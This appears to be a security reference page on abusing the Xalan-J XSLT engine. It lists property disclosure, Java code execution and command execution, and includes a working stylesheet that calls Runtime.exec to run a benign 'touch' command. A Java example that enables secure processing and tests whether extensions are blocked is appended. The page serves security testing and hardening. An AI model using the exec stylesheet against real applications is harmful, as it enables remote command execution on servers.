Engine_XalanJ
Xalan-J is a Java-based XSLT engine by the Apache Project.
Supported version
1.0
Command line
$> java org.apache.xalan.xslt.Process -in foo.xml -xsl foo.xsl
Note: xml-apis.jar, xercesImpl.jar and xalan*.jar must be in the $CLASSPATH
Identification strings
Property | Value |
---|---|
xsl:vendor-url | http://xml.apache.org/xalan-j |
xsl:vendor | Apache Software Foundation |
xsl:version | 1.0 |
Special features
- Java properties disclosure
- Java environment disclosure
- Java code execution
- Arbitrary command execution
- File creation
- JDBC connectivity
Java properties disclosure
The standard xsl:system-property() function can be called with non-standard arguments, which are mapped to Java properties. In this example, the names of the Java properties are stored in a separate XML file. For each property, the XSLT code displays its name and its value.
Namespace | Function | PoC | Sample output |
---|---|---|---|
http://www.w3.org/1999/XSL/Transform | system-property() |
Java environment disclosure
The checkEnvironment() extension function (documented here) will display some information about the execution context (packages, paths, versions, ...).
Namespace | Extension function | PoC | Sample output |
---|---|---|---|
http://xml.apache.org/xalan | checkEnvironment() |
Java code execution
The attached code will display the current date using a newly created "java.util.Date" object. This should be enough to demonstrate Java code execution.
Namespace | Extension function | PoC | Sample output |
---|---|---|---|
http://xml.apache.org/xalan/java/java.util.Date | new() | Current date: Wed Jan 11 22:45:07 CET 2012 |
Execution of external commands
The following code will execute the command "touch /tmp/hello":
<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:j="http://xml.apache.org/xalan/java"
    exclude-result-prefixes="j"
    version="1.0">
  <xsl:template match="/">
    <xsl:variable name="c"><![CDATA[touch = /tmp/hello]]></xsl:variable>
    <xsl:variable name="a" select="j:split($c, ' = ')"/>
    <xsl:variable name="r" select="j:java.lang.Runtime.getRuntime()"/>
    <xsl:variable name="p" select="j:exec($r, $a )"/>
    No content at the moment ...
  </xsl:template>
</xsl:stylesheet>
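A defensive counterpart to the Java code execution and external command features above, added here as an example and not part of the original page: a JAXP factory with secure processing enabled, probed with the harmless java.util.Date call from the table. The class and method names (SecureXsltDemo, hardenedFactory, probe) are hypothetical, and the example assumes a processor that honours the secure-processing feature, such as Xalan-J 2.7.x or the JDK's built-in XSLT engine.

```java
import java.io.StringReader;
import java.io.StringWriter;
import javax.xml.XMLConstants;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;

public class SecureXsltDemo {
    // Constructed probe stylesheet: instantiates java.util.Date through the
    // Xalan Java extension namespace listed in the table above (harmless).
    static final String PROBE_XSL =
        "<xsl:stylesheet version='1.0'"
      + " xmlns:xsl='http://www.w3.org/1999/XSL/Transform'"
      + " xmlns:date='http://xml.apache.org/xalan/java/java.util.Date'>"
      + "<xsl:output method='text'/>"
      + "<xsl:template match='/'>"
      + "<xsl:value-of select='date:new()'/>"
      + "</xsl:template></xsl:stylesheet>";

    // Factory to use for stylesheets that are not fully trusted.
    static TransformerFactory hardenedFactory() throws Exception {
        TransformerFactory tf = TransformerFactory.newInstance();
        // Assumption: the processor disables extension functions and
        // extension elements when this JAXP feature is set.
        tf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        return tf;
    }

    // Runs the probe and reports what the processor did with the extension call.
    static String probe(TransformerFactory tf) {
        try {
            Transformer t = tf.newTransformer(new StreamSource(new StringReader(PROBE_XSL)));
            StringWriter out = new StringWriter();
            t.transform(new StreamSource(new StringReader("<doc/>")), new StreamResult(out));
            return "EXTENSION EXECUTED, output: " + out;
        } catch (Exception e) {
            // Rejection can surface at stylesheet compile time or at transform time.
            return "extension rejected: " + e.getMessage();
        }
    }

    public static void main(String[] args) throws Exception {
        // The default factory's result depends on the processor's own defaults.
        System.out.println("default  factory -> " + probe(TransformerFactory.newInstance()));
        System.out.println("hardened factory -> " + probe(hardenedFactory()));
    }
}
```

Running the probe against the factory an application actually uses is a quick regression check that untrusted stylesheets cannot reach the extension namespaces.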